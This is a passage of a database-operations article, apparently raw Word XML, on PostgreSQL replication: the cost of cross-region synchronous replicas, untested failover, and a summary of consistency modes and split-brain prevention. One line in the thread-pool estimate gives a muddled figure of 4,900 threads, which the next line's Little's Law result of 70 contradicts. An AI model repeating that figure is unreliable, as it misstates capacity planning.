        <w:t>Primary in us-east-1, replica in us-west-2 (70ms RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE7D88" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="70B29D93" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Effect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F540212" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Every write transaction: +70ms latency (must wait for replica acknowledgment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E03526" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Write throughput: capped at ~14 transactions/second per connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4863A6A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD492F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For a web application with 1,000 write requests/second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED54DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each write waits 70ms → thread held for 70ms per write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD4C06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Thread pool needed: 1,000 × 0.070 = 70 threads per second × 70ms = 4,900 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA3C54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (Little's Law: L = λ × W = 1000 × 0.07 = 70 concurrent writes → 70 threads minimum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A91431" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F78860C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBB69EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Synchronous replica in same datacenter (&lt; 1ms RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB94B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Async replica in remote region for geographic redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E44435" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B199367" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  synchronous_standby_names = 'FIRST 1 (local_replica_1, local_replica_2)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F388A58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Sync to local replica (low latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77202716" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Remote replicas receive async (no latency impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27885E05" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Accept: committed data may be lost in full datacenter failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358BB65E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">             (remote replicas may be behind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDFF1BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- But: within-datacenter failover is zero-loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6949C556" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 5: Not Testing Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2460BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A00D19" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The untested failover problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B235B23" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replication configured and running normally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466C2C80" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No failover tested in 2 years</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF3FBCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary fails in production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310F9E06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2E08A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Discovered during failover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E922F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Failover automation configured but never triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0AF2A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Required manual steps that no one remembered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250C1237" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    New primary can't accept writes (configuration issue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B239322" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Applications hardcoded primary hostname (not using DNS alias or load balancer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED0604E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Monitoring didn't alert on secondary failures (was misconfigured for years)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B9230" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F40D09" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Total downtime: 4 hours instead of 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA4E4B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="36E62CA6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374BA7AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Regular failover drills (chaos engineering):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6CB412" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Monthly: promote replica in staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21450C07" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Quarterly: promote replica in production (during low-traffic window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB3B30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A87B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45445077" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Application correctly routes to new primary (DNS TTL, load balancer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFC3CA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Old primary correctly becomes replica (pg_rewind works)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0596FF11" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Monitoring correctly detects and alerts on failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3EB1F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Runbook is current (all steps documented, tested, and work)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531FC3BA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A48AA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Automated testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376787C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    CI pipeline: spin up primary + replica, fail primary, verify replica promotes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D09ABD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 verify application connects to new primary, verify no data loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CCF609" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="3F0999AF">
          <v:rect id="_x0000_i5519" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C07AC02" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5EA292" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028F665A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Database Replication = Maintaining Multiple Synchronized Copies of Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52563DB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                       Across Independent Failure Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AB06F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                       With Explicit Consistency, Availability, and Performance Trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509F7514" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="105B698B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Physical Foundation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DECB4D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WAL (Write-Ahead Log): ordered, durable record of every change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2708D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  LSN (Log Sequence Number): global clock of the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36049FE6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replication lag = primary LSN - replica apply LSN (bytes → time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7709C0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BE0ABA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replication types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE64B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Physical: byte-level WAL streaming → exact byte-for-byte copies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295A0CDB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              same PostgreSQL version, same architecture, read-only replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC01A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Logical: decoded row-level changes → different versions/systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C74FB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              selective table replication, bidirectional possible, CDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448D075" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1871D0DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Consistency Spectrum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61660573" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  async:         primary commits without replica acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBE6D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 RPO = replication lag (seconds to minutes of potential loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203ACAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 Lowest latency impact (no waiting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1204829B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52131D4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  sync (on):     primary waits for replica WAL flush before commit returns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257ADCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 RPO = 0 for server failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B34600" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 Latency impact = 1 RTT to replica (keep replica close!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50912E23" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3E122" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  remote_apply:  primary waits for replica to apply changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6600CF2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 RPO = 0, immediate read-after-write on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48192566" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 Highest latency (includes apply time, not just network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCA668" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4889EB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  quorum:        W + R &gt; N → overlap guarantees consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DFE7AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                 Tunable: trade latency for consistency per operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C76929" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1D19FBCD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Topology Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DD99E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Single primary: simple, no conflicts, write bottleneck, single failover point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865EFC3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Multi-primary: write scalability, conflict complexity, geographic distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABD233" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Quorum-based: configurable consistency, no single write bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FABB783" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="49ABCCEB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Failure Modes and Their Costs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE13347" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Split brain: two primaries accepting writes → data corruption (worst outcome)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007917D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Prevention: consensus-based leader election (etcd/ZooKeeper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40936B6B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">               + fencing (STONITH, storage fence, network fence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728CAE14" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF2224" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Data loss in failover: async replica promoted, uncommitted txs lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD6FB4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Prevention: sync replication OR accept bounded loss (RPO &gt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343482C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07349C86" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replication lag: reads from replica return stale data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086580AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Application patterns: sticky routing, wait-for-replica, bounded staleness</w:t>
      </w:r>
    </w:p>
